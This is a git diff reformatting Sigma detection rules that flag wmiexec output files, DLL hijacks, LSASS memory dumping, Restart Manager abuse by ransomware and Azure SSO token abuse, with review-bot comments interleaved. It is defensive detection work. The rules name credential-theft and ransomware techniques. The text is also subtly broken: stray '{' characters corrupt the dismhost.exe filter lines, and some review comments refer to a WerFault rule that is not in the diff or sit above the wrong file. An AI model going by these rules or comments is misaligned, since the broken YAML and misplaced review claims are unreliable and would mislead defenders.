author: Julia Fomina, oscd.community
diff --git a/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml b/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml
index 4a35b5e55..47e292616 100644
--- a/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml
+++ b/sigma/sysmon/file/file_event/file_event_win_wmiexec_default_filename.yml
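Review bot: The reflowed description of the WerFault rule keeps the typo `copoed`; since this line is rewritten anyway, the same change could read `description: Detects WerFault copied to a suspicious folder, which could be a sign of WerFault DLL hijacking`. The title line "Creation of an WerFault.exe in Unusual Folder" has a similar slip ("an WerFault.exe"), but it is a context line and not part of this change.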
@@ -1,8 +1,7 @@ title: Wmiexec Default Output File id: 8d5aca11-22b3-4f22-b7ba-90e60533e1fb status: experimental -description: Detects the creation of the default output filename used by the wmiexec - tool +description: Detects the creation of the default output filename used by the wmiexec tool references: - https://www.crowdstrike.com/blog/how-to-detect-and-prevent-impackets-wmiexec/ - https://github.com/fortra/impacket/blob/f4b848fa27654ca95bc0f4c73dbba8b9c2c9f30a/examples/wmiexec.py @@ -21,9 +20,9 @@ detection: EventID: 11 Channel: Microsoft-Windows-Sysmon/Operational selection: - - TargetFilename|re: \\Windows\\__1\d{9}\.\d{1,7}$ - - TargetFilename|re: C:\\__1\d{9}\.\d{1,7}$ - - TargetFilename|re: D:\\__1\d{9}\.\d{1,7}$ + - TargetFilename|re: \\Windows\\__1\d{9}\.\d{1,7}$ # Admin$ + - TargetFilename|re: C:\\__1\d{9}\.\d{1,7}$ # C$ + - TargetFilename|re: D:\\__1\d{9}\.\d{1,7}$ # D$ condition: file_event and selection falsepositives: - Unlikely diff --git a/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml b/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml index 7a8dd7270..d6fa71e7f 100644 --- a/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml +++ b/sigma/sysmon/file/file_event/file_event_win_wmiprvse_wbemcomn_dll_hijack.yml @@ -1,8 +1,7 @@ title: Wmiprvse Wbemcomn DLL Hijack - File id: 614a7e17-5643-4d89-b6fe-f9df1a79641c status: test -description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` - directory over the network and loading it for a WMI DLL Hijack scenario. +description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario. references: - https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) 
diff --git a/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml b/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml index 4b6e0681a..70e619d7c 100644 --- a/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml +++ b/sigma/sysmon/file/file_event/file_event_win_wpbbin_persistence.yml @@ -1,8 +1,7 @@ title: UEFI Persistence Via Wpbbin - FileCreation id: e94b9ddc-eec5-4bb8-8a58-b9dc5f4e185f status: test -description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" - directory. Which could be indicative of UEFI based persistence method +description: Detects creation of a file named "wpbbin" in the "%systemroot%\system32\" directory. Which could be indicative of UEFI based persistence method references: - https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c - https://persistence-info.github.io/Data/wpbbin.html @@ -24,7 +23,6 @@ detection: TargetFilename: C:\Windows\System32\wpbbin.exe condition: file_event and selection falsepositives: - - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks - @0gtweet for the tip) + - Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip) level: high ruletype: Sigma diff --git a/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml b/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml index aa26ecbd5..675ee9616 100644 --- a/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml +++ b/sigma/sysmon/file/file_event/file_event_win_writing_local_admin_share.yml 
@@ -1,12 +1,9 @@
title: Writing Local Admin Share
id: 4aafb0fa-bff5-4b9d-b99e-8093e659c65f
status: test
-description: 'Aversaries may use to interact with a remote network share using Server
- Message Block (SMB).
-
+description: |
+ Aversaries may use to interact with a remote network share using Server Message Block (SMB).
This technique is used by post-exploitation frameworks.
-
-
- '
references:
- https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.002/T1021.002.md#atomic-test-4---execute-command-writing-output-to-local-admin-share
author: frack113
diff --git a/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml b/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml
index 2fd2aac3f..7fcfd74f3 100644
--- a/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml
+++ b/sigma/sysmon/image_load/image_load_cmstp_load_dll_from_susp_location.yml
@@ -21,6 +21,7 @@ detection:
selection:
Image|endswith: \cmstp.exe
ImageLoaded|contains:
+ # Add more suspicious paths as you see fit in your env
- \PerfLogs\
- \ProgramData\
- \Users\
diff --git a/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml b/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml
index 03a9b620f..71f2e4a31 100644
--- a/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml
+++ b/sigma/sysmon/image_load/image_load_dll_amsi_suspicious_process.yml
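Review bot: The new block-scalar description of "Writing Local Admin Share" carries over a garbled first sentence: `Aversaries may use to interact with a remote network share using Server Message Block (SMB).` misspells the subject and is missing an object after "use". Since the line is rewritten anyway, suggest `Adversaries may use this technique to interact with a remote network share using Server Message Block (SMB).`; the second sentence can stay as is.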
@@ -1,8 +1,7 @@ title: Amsi.DLL Loaded Via LOLBIN Process id: 6ec86d9e-912e-4726-91a2-209359b999b9 status: experimental -description: Detects loading of "Amsi.dll" by a living of the land process. This could - be an indication of a "PowerShell without PowerShell" attack +description: Detects loading of "Amsi.dll" by a living of the land process. This could be an indication of a "PowerShell without PowerShell" attack references: - Internal Research - https://www.paloaltonetworks.com/blog/security-operations/stopping-powershell-without-powershell/ @@ -22,6 +21,7 @@ detection: selection: ImageLoaded|endswith: \amsi.dll Image|endswith: + # TODO: Add more interesting processes - \ExtExport.exe - \odbcconf.exe - \regsvr32.exe diff --git a/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml b/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml index 27edbfbe1..3de8726d6 100644 --- a/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_azure_microsoft_account_token_provider_dll_load.yml 
@@ -1,14 +1,9 @@ title: Potential Azure Browser SSO Abuse id: 50f852e6-af22-4c78-9ede-42ef36aa3453 status: test -description: 'Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens - for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure - AD and a user logs in with their Azure AD account) wanting to perform SSO authentication - in the browser. - +description: | + Detects abusing Azure Browser SSO by requesting OAuth 2.0 refresh tokens for an Azure-AD-authenticated Windows user (i.e. the machine is joined to Azure AD and a user logs in with their Azure AD account) wanting to perform SSO authentication in the browser. An attacker can use this to authenticate to Azure AD in a browser as that user. - - ' references: - https://posts.specterops.io/requesting-azure-ad-request-tokens-on-azure-ad-joined-machines-for-browser-sso-2b0409caad30 author: Den Iuzvyk @@ -33,6 +28,7 @@ detection: - C:\Windows\System32\ - C:\Windows\SysWOW64\ Image|endswith: \BackgroundTaskHost.exe + # CommandLine|contains: '-ServerNameBackgroundTaskHost.WebAccountProvider' filter_optional_devenv: Image|startswith: - C:\Program Files\Microsoft Visual Studio\ @@ -43,11 +39,11 @@ detection: - C:\Program Files (x86)\Internet Explorer\iexplore.exe - C:\Program Files\Internet Explorer\iexplore.exe filter_optional_edge_1: - - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ - - Image|endswith: \WindowsApps\MicrosoftEdge.exe - - Image: - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe - - C:\Program Files\Microsoft\Edge\Application\msedge.exe + - Image|startswith: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\ + - Image|endswith: \WindowsApps\MicrosoftEdge.exe + - Image: + - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe + - C:\Program Files\Microsoft\Edge\Application\msedge.exe filter_optional_edge_2: Image|startswith: - C:\Program Files (x86)\Microsoft\EdgeCore\ 
@@ -58,10 +54,9 @@ detection:
filter_optional_onedrive:
Image|endswith: \AppData\Local\Microsoft\OneDrive\OneDrive.exe
filter_optional_null:
- Image: null
+ Image:
condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*)
falsepositives:
- - False positives are expected since this rules is only looking for the DLL load
- event. This rule is better used in correlation with related activity
+ - False positives are expected since this rules is only looking for the DLL load event. This rule is better used in correlation with related activity
level: low
ruletype: Sigma
diff --git a/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml b/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
index f1b0e8fc1..1212e9658 100644
--- a/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
+++ b/sigma/sysmon/image_load/image_load_dll_comsvcs_load_renamed_version_by_rundll32.yml
@@ -22,11 +22,12 @@ detection:
selection:
Image|endswith: \rundll32.exe
Hashes|contains:
- - IMPHASH=eed93054cb555f3de70eaa9787f32ebb
- - IMPHASH=5e0dbdec1fce52daae251a110b4f309d
- - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8
- - IMPHASH=407ca0f7b523319d758a40d7c0193699
- - IMPHASH=281d618f4e6271e527e6386ea6f748de
+ # Add more hashes for other windows versions
+ - IMPHASH=eed93054cb555f3de70eaa9787f32ebb # Windows 11 21H2 x64
+ - IMPHASH=5e0dbdec1fce52daae251a110b4f309d # Windows 10 1607
+ - IMPHASH=eadbccbb324829acb5f2bbe87e5549a8 # Windows 10 1809
+ - IMPHASH=407ca0f7b523319d758a40d7c0193699 # Windows 10 2004 x64
+ - IMPHASH=281d618f4e6271e527e6386ea6f748de # Windows 10 2004 x86
filter:
ImageLoaded|endswith: \comsvcs.dll
condition: image_load and (selection and not filter)
diff --git a/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml b/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml
index c9c186f88..6cf487d55 100644
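Review bot: In the Azure Browser SSO hunk, `filter_optional_null` now relies on an implicit YAML null (`Image:` with no value) where the old side spelled it `Image: null`; both load as a null value, but the explicit form is the Sigma idiom for "match events where this field is absent" and makes the intent visible to the next reader. Suggest keeping `Image: null`, or at least annotating the new line with `# match events that carry no Image field`. The `detection` block this filter belongs to starts above the hunk.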
--- a/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_credui_uncommon_process_load.yml @@ -1,9 +1,7 @@ title: CredUI.DLL Loaded By Uncommon Process id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 status: experimental -description: Detects loading of "credui.dll" and related DLLs by an uncommon process. - Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" - or "CredUnPackAuthenticationBufferW". +description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW". references: - https://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password @@ -25,12 +23,12 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImageLoaded|endswith: - - \credui.dll - - \wincredui.dll - - OriginalFileName: - - credui.dll - - wincredui.dll + - ImageLoaded|endswith: + - \credui.dll + - \wincredui.dll + - OriginalFileName: + - credui.dll + - wincredui.dll filter_main_generic: Image|startswith: - C:\Program Files (x86)\ @@ -41,7 +39,7 @@ detection: Image: - C:\Windows\explorer.exe - C:\Windows\ImmersiveControlPanel\SystemSettings.exe - - C:\Windows\regedit.exe + - C:\Windows\regedit.exe # This FP is triggered for example when choosing the "Connect Network Registry" from the menu filter_optional_opera: Image|endswith: \opera_autoupdate.exe filter_optional_process_explorer: diff --git a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml index e1854ae8b..562a0f34e 100644 
--- a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_susp_load.yml @@ -1,20 +1,13 @@ title: Load Of Dbghelp/Dbgcore DLL From Suspicious Process id: 0e277796-5f23-4e49-a490-483131d4f6e1 related: - - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc - type: similar + - id: bdc64095-d59a-42a2-8588-71fd9c9d9abc # Unsigned Loading + type: similar status: test -description: 'Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) - by suspicious processes. - - Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API - found in dbghelp.dll or dbgcore.dll. - - As an example, SilentTrynity C2 Framework has a module that leverages this API - to dump the contents of Lsass.exe and transfer it over the network back to the - attacker''s machine. - - ' +description: | + Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. + Tools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. + As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. references: - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html 
@@ -40,24 +33,30 @@ detection: Image|endswith: - \msbuild.exe - \cmd.exe + # - '\svchost.exe' triggered by installing common software - \rundll32.exe + # - '\powershell.exe' triggered by installing common software - \winword.exe - \excel.exe - \powerpnt.exe - \outlook.exe - \monitoringhost.exe - \wmic.exe + # - '\msiexec.exe' an installer installing a program using one of those DLL will raise an alert - \bash.exe - \wscript.exe - \cscript.exe - \mshta.exe + # - '\regsvr32.exe' triggered by installing common software + # - '\schtasks.exe' triggered by installing software - \dnx.exe - \regsvcs.exe - \sc.exe - \scriptrunner.exe filter_tiworker: - CommandLine|startswith: C:\WINDOWS\winsxs\ - CommandLine|endswith: \TiWorker.exe -Embedding + # CommandLine field added by aurora + CommandLine|startswith: C:\WINDOWS\winsxs\ + CommandLine|endswith: \TiWorker.exe -Embedding condition: image_load and (selection and not 1 of filter*) falsepositives: - Unknown diff --git a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml index 6a89ac7c9..f2bf7ed63 100644 --- a/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_dbghelp_dbgcore_unsigned_load.yml 
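Review bot: `filter_tiworker` matches on `CommandLine`, a field that Sysmon image-load events (EventID 7) do not carry; the added comment `# CommandLine field added by aurora` acknowledges this, but it should state the consequence for everyone else, namely that on plain Sysmon the filter never matches and the TiWorker exclusion does not apply. A comment along the lines of `# CommandLine is absent from Sysmon EID 7; this filter only takes effect on backends that enrich image-load events with it (e.g. Aurora)` would make that explicit. The same situation exists in `filter_update` of image_load_dll_vss_ps_susp_load.yml, which keys on `CommandLine|startswith` and `CommandLine|contains` without any such note. The condition line at the end of this hunk (`not 1 of filter*`) is where an inert filter is otherwise invisible to the reader.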
@@ -1,20 +1,13 @@ title: Suspicious Unsigned Dbghelp/Dbgcore DLL Loaded id: bdc64095-d59a-42a2-8588-71fd9c9d9abc related: - - id: 0e277796-5f23-4e49-a490-483131d4f6e1 - type: similar + - id: 0e277796-5f23-4e49-a490-483131d4f6e1 # Suspicious Loading + type: similar status: test -description: 'Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) - by suspicious processes. - - Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API - found in dbghelp.dll or dbgcore.dll. - - As an example, SilentTrynity C2 Framework has a module that leverages this API - to dump the contents of Lsass.exe and transfer it over the network back to the - attacker''s machine. - - ' +description: | + Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes. + Tools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll. + As an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine. references: - https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump - https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html diff --git a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml index 93351147b..7b086fc72 100644 --- a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_suspicious_load.yml 
@@ -1,24 +1,19 @@ title: Load Of RstrtMgr.DLL By A Suspicious Process id: b48492dc-c5ef-4572-8dff-32bc241c15c8 related: - - id: 3669afd2-9891-4534-a626-e5cf03810a61 - type: derived + - id: 3669afd2-9891-4534-a626-e5cf03810a61 + type: derived status: experimental -description: 'Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. - - This library has been used during ransomware campaigns to kill processes that - would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). - It has also recently been seen used by the BiBi wiper for Windows. - +description: | + Detects the load of RstrtMgr DLL (Restart Manager) by a suspicious process. + This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. - - ' references: - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/ - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/ - https://www.swascan.com/cactus-ransomware-malware-analysis/ - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html -author: "Luc G\xE9naux" +author: Luc Génaux date: 2023/11/28 tags: - attack.impact 
@@ -34,23 +29,24 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - ImageLoaded|endswith: \RstrtMgr.dll - - OriginalFileName: RstrtMgr.dll + - ImageLoaded|endswith: \RstrtMgr.dll + - OriginalFileName: RstrtMgr.dll selection_folders_1: Image|contains: + # Note: increase coverage by adding more suspicious paths - :\Perflogs\ - :\Users\Public\ - \Temporary Internet selection_folders_2: - - Image|contains|all: - - :\Users\ - - \Favorites\ - - Image|contains|all: - - :\Users\ - - \Favourites\ - - Image|contains|all: - - :\Users\ - - \Contacts\ + - Image|contains|all: + - :\Users\ + - \Favorites\ + - Image|contains|all: + - :\Users\ + - \Favourites\ + - Image|contains|all: + - :\Users\ + - \Contacts\ condition: image_load and (selection_img and 1 of selection_folders_*) falsepositives: - Processes related to software installation diff --git a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml index f517e71f2..6fa7e24d3 100644 --- a/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_rstrtmgr_uncommon_load.yml 
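Review bot: `selection_folders_1` lists only `:\Perflogs\`, `:\Users\Public\` and `\Temporary Internet`, while the sibling rule image_load_side_load_abused_dlls_susp_paths.yml in this same commit uses the same two-block path pattern and additionally covers `\Windows\Temp\` (and `\Pictures\` in its second block). Given the new `# Note: increase coverage by adding more suspicious paths` comment, aligning the two lists, for example by adding `- \Windows\Temp\` here, would give the RstrtMgr rule the same coverage as its sibling rather than leaving the note as a to-do. This is a detection-coverage observation, not a correctness defect in the changed lines.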
@@ -1,24 +1,19 @@ title: Load Of RstrtMgr.DLL By An Uncommon Process id: 3669afd2-9891-4534-a626-e5cf03810a61 related: - - id: b48492dc-c5ef-4572-8dff-32bc241c15c8 - type: derived + - id: b48492dc-c5ef-4572-8dff-32bc241c15c8 + type: derived status: experimental -description: 'Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. - - This library has been used during ransomware campaigns to kill processes that - would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). - It has also recently been seen used by the BiBi wiper for Windows. - +description: | + Detects the load of RstrtMgr DLL (Restart Manager) by an uncommon process. + This library has been used during ransomware campaigns to kill processes that would prevent file encryption by locking them (e.g. Conti ransomware, Cactus ransomware). It has also recently been seen used by the BiBi wiper for Windows. It could also be used for anti-analysis purposes by shut downing specific processes. - - ' references: - https://www.crowdstrike.com/blog/windows-restart-manager-part-1/ - https://www.crowdstrike.com/blog/windows-restart-manager-part-2/ - https://www.swascan.com/cactus-ransomware-malware-analysis/ - https://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html -author: "Luc G\xE9naux" +author: Luc Génaux date: 2023/11/28 tags: - attack.impact @@ -34,8 +29,8 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - ImageLoaded|endswith: \RstrtMgr.dll - - OriginalFileName: RstrtMgr.dll + - ImageLoaded|endswith: \RstrtMgr.dll + - OriginalFileName: RstrtMgr.dll filter_main_generic: Image|contains: - :\$WINDOWS.~BT\ diff --git a/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml b/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml index 917b341c5..b0fec4333 100644 
--- a/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml +++ b/sigma/sysmon/image_load/image_load_dll_sdiageng_load_by_msdt.yml @@ -1,8 +1,7 @@ title: Diagnostic Library Sdiageng.DLL Loaded By Msdt.EXE id: ec8c4047-fad9-416a-8c81-0f479353d7f6 status: test -description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities - exploiting msdt.exe binary to load the "sdiageng.dll" library +description: Detects both of CVE-2022-30190 (Follina) and DogWalk vulnerabilities exploiting msdt.exe binary to load the "sdiageng.dll" library references: - https://www.securonix.com/blog/detecting-microsoft-msdt-dogwalk/ author: Greg (rule) diff --git a/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml index f0dcbd1ce..1bd101add 100644 --- a/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_system_management_automation_susp_load.yml 
@@ -1,19 +1,16 @@ title: PowerShell Core DLL Loaded By Non PowerShell Process id: 092bc4b9-3d1d-43b4-a6b4-8c8acd83522f related: - - id: 867613fb-fa60-4497-a017-a82df74a172c - type: obsoletes - - id: fe6e002f-f244-4278-9263-20e4b593827f - type: obsoletes + - id: 867613fb-fa60-4497-a017-a82df74a172c + type: obsoletes + - id: fe6e002f-f244-4278-9263-20e4b593827f + type: obsoletes status: experimental -description: Detects loading of essential DLLs used by PowerShell, but not by the - process powershell.exe. Detects behaviour similar to meterpreter's "load powershell" - extension. +description: Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's "load powershell" extension. references: - https://adsecurity.org/?p=2921 - https://github.com/p3nt4/PowerShdll -author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez - (Cyb3rWard0g), OTR (Open Threat Research) +author: Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton, Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) date: 2019/11/14 modified: 2023/05/31 tags: @@ -28,14 +25,14 @@ detection: EventID: 7 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: System.Management.Automation - - OriginalFileName: System.Management.Automation.dll - - ImageLoaded|endswith: - - \System.Management.Automation.dll - - \System.Management.Automation.ni.dll + - Description: System.Management.Automation + - OriginalFileName: System.Management.Automation.dll + - ImageLoaded|endswith: + - \System.Management.Automation.dll + - \System.Management.Automation.ni.dll filter_main_generic: Image|endswith: - - :\Program Files\PowerShell\7\pwsh.exe + - :\Program Files\PowerShell\7\pwsh.exe # PowerShell 7 - :\Windows\System32\dsac.exe - :\WINDOWS\System32\RemoteFXvGPUDisablement.exe - :\Windows\System32\runscripthelper.exe 
@@ -76,8 +73,10 @@ detection: Image|endswith: - \thor64.exe - \thor.exe + # User: 'NT AUTHORITY\SYSTEM' # if set, matches all powershell processes not launched by SYSTEM filter_optional_aurora: - Image: null + # This filter is to avoid a race condition FP with this specific ETW provider in aurora + Image: condition: image_load and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - Used by some .NET binaries, minimal on user workstation. diff --git a/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml b/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml index bf611dc86..739ecdbcd 100644 --- a/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_tttracer_module_load.yml @@ -1,13 +1,12 @@ title: Time Travel Debugging Utility Usage - Image id: e76c8240-d68f-4773-8880-5c6f63595aaf status: test -description: Detects usage of Time Travel Debugging Utility. Adversaries can execute - malicious processes and dump processes, such as lsass.exe, via tttracer.exe. +description: Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe. references: - https://lolbas-project.github.io/lolbas/Binaries/Tttracer/ - https://twitter.com/mattifestation/status/1196390321783025666 - https://twitter.com/oulusoyum/status/1191329746069655553 -author: "Ensar \u015Eamil, @sblmsrsn, @oscd_initiative" +author: Ensar Şamil, @sblmsrsn, @oscd_initiative date: 2020/10/06 modified: 2022/12/02 tags: diff --git a/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml index 9b8156ebe..6e569ebcf 100644 --- a/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vss_ps_susp_load.yml 
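Review bot: The added comment `# User: 'NT AUTHORITY\SYSTEM' # if set, matches all powershell processes not launched by SYSTEM` is ambiguous about what it would do: placed inside this filter map it would AND with the `Image|endswith` thor entries and only narrow that specific exclusion, which is not what the text describes. If the intent is an optional environment-wide suppression of SYSTEM-launched loads, say so and state which selection it belongs in, e.g. `# Optional: add a separate filter on User: 'NT AUTHORITY\SYSTEM' to suppress loads by SYSTEM processes`. The enclosing filter's name is outside the hunk, so its role could not be verified here. Separately, `Image: null` was changed to a bare `Image:`; both parse to null, but the explicit form documents the "field absent" intent better than an empty value next to the new race-condition comment.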
@@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy VSS_PS.dll Load id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 related: - - id: 48bfd177-7cf2-412b-ad77-baf923489e82 - type: similar - - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 - type: similar + - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll + type: similar + - id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 # vssapi.dll + type: similar status: experimental description: Detects the image load of vss_ps.dll by uncommon executables references: @@ -48,14 +48,15 @@ detection: - \WmiPrvSE.exe - \System32\SystemPropertiesAdvanced.exe filter_programfiles: + # When using this rule in your environment replace the "Program Files" folder by the exact applications you know use this. Examples would be software such as backup solutions Image|startswith: - C:\Program Files\ - C:\Program Files (x86)\ filter_update: - CommandLine|startswith: C:\$WinREAgent\Scratch\ - CommandLine|contains: \dismhost.exe { + CommandLine|startswith: C:\$WinREAgent\Scratch\ + CommandLine|contains: \dismhost.exe { filter_image_null: - Image: null + Image: condition: image_load and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml b/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml index 80e093dc2..05c58888d 100644 --- a/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml +++ b/sigma/sysmon/image_load/image_load_dll_vssapi_susp_load.yml @@ -1,10 +1,10 @@ title: Suspicious Volume Shadow Copy Vssapi.dll Load id: 37774c23-25a1-4adb-bb6d-8bb9fd59c0f8 related: - - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 - type: similar - - id: 48bfd177-7cf2-412b-ad77-baf923489e82 - type: similar + - id: 333cdbe8-27bb-4246-bf82-b41a0dca4b70 # vss_ps.dll + type: similar + - id: 48bfd177-7cf2-412b-ad77-baf923489e82 # vsstrace.dll + type: similar status: experimental description: Detects the image load of VSS DLL by uncommon executables references: 
